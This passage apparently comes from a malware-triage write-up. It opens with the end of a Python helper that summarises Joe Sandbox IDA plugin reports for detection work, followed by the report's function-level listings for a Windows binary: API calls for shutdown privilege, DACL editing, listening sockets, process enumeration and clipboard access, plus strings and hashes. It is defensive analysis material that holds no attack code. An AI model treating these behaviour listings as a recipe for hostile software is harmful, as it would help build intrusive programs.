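    return [label for label, needed in PATTERNS.items() if needed <= names]


def triage(text):
    """One summary record per function block: the fields a hunt query or YARA draft starts from."""
    report = []
    for b in parse_blocks(text):
        listed = [s for s in b.fields.get("String ID", "").split("$") if s]  # "$" separates strings
        report.append({"opcode_id": b.fields.get("Opcode ID", "")[:16],
                       "apis": sorted(b.api_names()), "strings": b.strings + listed,
                       "keys": annotate_keys(b), "patterns": match_patterns(b)})
    return report
```

Run `triage(SAMPLE)` (or feed it the text of a full report) to get one record per function with its resolved API names, the strings the plugin associated with it, named key codes and any matched pattern. The pattern list is deliberately conservative: it requires the full set of calls that make a technique work, so a function that merely calls SetForegroundWindow is not flagged.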
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                              • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                              • __swprintf.LIBCMT ref: 004789D3
                                                                                              • __swprintf.LIBCMT ref: 00478A1D
                                                                                              • __swprintf.LIBCMT ref: 00478A4B
                                                                                              • __swprintf.LIBCMT ref: 00478A79
                                                                                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                              • __swprintf.LIBCMT ref: 00478AA7
                                                                                              • __swprintf.LIBCMT ref: 00478AD5
                                                                                              • __swprintf.LIBCMT ref: 00478B03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 999945258-2428617273
                                                                                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
• __wsplitpath.LIBCMT ref: 00403492
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscpy.LIBCMT ref: 004034A7
• _wcscat.LIBCMT ref: 004034BC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
• _wcscpy.LIBCMT ref: 004035A0
• _wcslen.LIBCMT ref: 00403623
• _wcslen.LIBCMT ref: 0040367D
Strings
• Error opening the file, xrefs: 00428231
• _, xrefs: 0040371C
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
• Unterminated string, xrefs: 00428348
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
• API String ID: 3393021363-188983378
• Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
• Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
• Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
• Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
• GetFileAttributesW.KERNEL32(?), ref: 00431AE7
• SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
• FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
• FindClose.KERNEL32(00000000), ref: 00431B20
• FindClose.KERNEL32(00000000), ref: 00431B34
• FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
• FindClose.KERNEL32(00000000), ref: 00431BCD
• FindClose.KERNEL32(00000000), ref: 00431BDB
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
• Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
• __swprintf.LIBCMT ref: 00431C2E
• _wcslen.LIBCMT ref: 00431C3A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
Similarity
• API ID: CreateDirectoryFullNamePath__swprintf_wcslen
• String ID: :$\$\??\%s
• API String ID: 2192556992-3457252023
• Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
• Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
APIs
• GetLocalTime.KERNEL32(?), ref: 004722A2
• __swprintf.LIBCMT ref: 004722B9
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
• SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
• SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
• SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
• SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
• SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
Similarity
• API ID: FolderPath$LocalTime__swprintf
• String ID: %.3d
• API String ID: 3337348382-986655627
• Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
• Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
• Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
• Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                              • String ID:
                                                                                              • API String ID: 1255039815-0
                                                                                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                              APIs
                                                                                              • __swprintf.LIBCMT ref: 00433073
                                                                                              • __swprintf.LIBCMT ref: 00433085
                                                                                              • __wcsicoll.LIBCMT ref: 00433092
                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                              • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                              • LockResource.KERNEL32(?), ref: 00433120
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                              • String ID:
                                                                                              • API String ID: 1158019794-0
                                                                                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                              • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                              • API String ID: 4194297153-14809454
                                                                                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_strncmp
                                                                                              • String ID: @oH$\$^$h
                                                                                              • API String ID: 2175499884-3701065813
                                                                                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 540024437-0
                                                                                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                              • API String ID: 0-2872873767
                                                                                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                              • __wsplitpath.LIBCMT ref: 00475644
                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                              • _wcscat.LIBCMT ref: 00475657
                                                                                              • __wcsicoll.LIBCMT ref: 0047567B
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                              • String ID:
                                                                                              • API String ID: 2547909840-0
                                                                                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• FindFirstFileW.KERNEL32(?,?), ref: 004524DF
• Sleep.KERNEL32(0000000A), ref: 0045250B
